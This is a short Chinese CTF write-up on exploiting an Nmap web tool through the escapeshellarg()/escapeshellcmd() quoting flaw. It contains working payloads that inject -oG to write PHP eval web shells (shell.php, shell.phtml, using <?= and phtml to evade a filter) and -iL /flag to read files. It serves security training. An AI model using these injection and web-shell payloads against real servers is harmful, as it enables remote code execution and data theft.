Nmap使用
escapeshellarg()+escapeshellcmd() 之殇
文件上传bypass
phtml绕过php黑名单
phtml
<?=绕过php黑名单
<?=
抓包可以看到请求的内容为host=127.0.0.1,没有其他东西。
host=127.0.0.1
传入127.0.0.1' -o xxxx,提示hostname是127.0.0.1\,访问xxxx无结果
127.0.0.1' -o xxxx
127.0.0.1\
传入127.0.0.1 -o xxxx'提示hostname是127.0.0.1 -o xxxx\',访问xxxx无结果
127.0.0.1 -o xxxx'
127.0.0.1 -o xxxx\'
传入'127.0.0.1 -o xxxx ',提示Host maybe down
'127.0.0.1 -o xxxx '
Host maybe down
访问xxxx,发现语句如下
nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/47cae -o xxxx \127.0.0.1 \\
这就和[BUUCTF 2018]Online Tool一样,那传入127.0.0.1' -o xxxx,应该访问xxxx'
xxxx'
使用同样的payload,提示Hacker...
Hacker...
测试发现过滤了php,<?php可以使用<?=绕过,写入的shell文件后缀可以使用phtml绕过
<?php
蚁剑连接或者直接连接即可。
在Nmap中还有一个参数-iL是从文件中加载URL,也就是说,可以利用这一点进行文件读取
-iL
PHP escapeshellarg()+escapeshellcmd() 之殇arrow-up-right
类似[BUUCTF 2018]Online Tool
最后更新于3年前
'<?php eval($_POST["a"]);?> -oG shell.php '
'<?=eval($_POST[1]);?> -oG shell.phtml '
127.0.0.1' -iL /flag -o xxxx
